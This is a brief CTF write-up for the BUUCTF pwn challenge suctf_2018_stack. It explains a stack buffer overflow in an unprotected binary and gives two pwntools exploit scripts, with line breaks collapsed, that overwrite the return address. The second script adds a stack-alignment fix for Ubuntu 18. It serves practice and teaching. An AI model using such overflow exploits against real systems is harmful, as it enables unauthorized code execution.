[BUUCTF-pwn]——suctf_2018_stack

• 題目地址：https://buuoj.cn/challenges#suctf_2018_stack

什么保護都沒開

在IDA中一查看，發現有點簡單太簡單了.本來剛開始以為溢出空間不夠只有兩個地址,一個epb, 一個返回地址, 可是結果僅僅返回地址就可以了



exploit

from pwn import * p = remote('node3.buuoj.cn',29819)leave_ret = 0x0000000000400732 pop_rdi_ret = 0x00000000004007a3 ret_addr = 0x0400676 payload = 'a' * (0x20 + 8) + p64(ret_addr) p.send(payload) p.interactive()

結果發現想的有點簡單, 這道題檢查的其實是棧平衡的問題,因為是Ubuntu18
所以我們稍微改一次就好

exploit

from pwn import * p = remote('node3.buuoj.cn',29819)leave_ret = 0x0000000000400732 pop_rdi_ret = 0x00000000004007a3 ret_addr = 0x0400677 #0x0400678也是可以的,只要使得棧上少一個或者多一個數據就OK了 payload = 'a' * (0x20 + 8) + p64(ret_addr) p.send(payload) p.interactive()

總結

以上是生活随笔為你收集整理的[BUUCTF-pwn]——suctf_2018_stack的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。